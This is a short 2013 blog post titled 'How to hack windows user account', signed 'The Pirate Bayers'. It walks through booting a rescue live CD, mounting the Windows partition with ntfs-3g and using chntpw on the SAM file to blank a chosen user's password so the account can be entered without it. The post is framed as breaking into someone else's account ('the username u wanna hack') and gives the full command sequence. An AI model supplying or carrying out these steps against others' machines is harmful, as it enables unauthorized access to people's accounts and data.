Monday, 17 June 2013


How to hack windows user account ::

The Pirate Bayers

Just download the .iso file for the System Rescue Live CD n burn it to disc or usb. Boot from the cd/usb n hit the default option when the blue screen appears. After everything loads, u r presented with a command-line interface, So type

f d i s k - l

to see the drives n partitions on ur computer. Select the windows partition n note the name,

e.g. / d e v / s d a 3

Then, run the following command:

ntfs-3g /dev/sda3 /mnt/windows –o force

(Make sure to replace / d e v / s d a 3 with the partition u noted earlier.)
Next, go to ur System32/config directory with this command :

cd /mnt/windows/Windows/System32/config

We want to edit the SAM file in this folder, so type the following command
to get a list of users :

chntpw –l SAM

Note the username u wanna access, n type the following command, replacing AJBOSS with the username u wanna hack.

chntpw –u "AJBOSS" SAM

At the next screen, choose the first option by typing the number

1

n hitting Enter. This will clear the user password, making it blank. When it asks u to write hive files, hit

y

n press Enter. It should say OK, n then u can type

reboot

to restart the computer. When u boot into Windows, u'll be able to log in to that user's account without a password.

Download link (about 300 - 400 mb) -System Rescue CD

The Pirate Bayers

No comments:

Post a Comment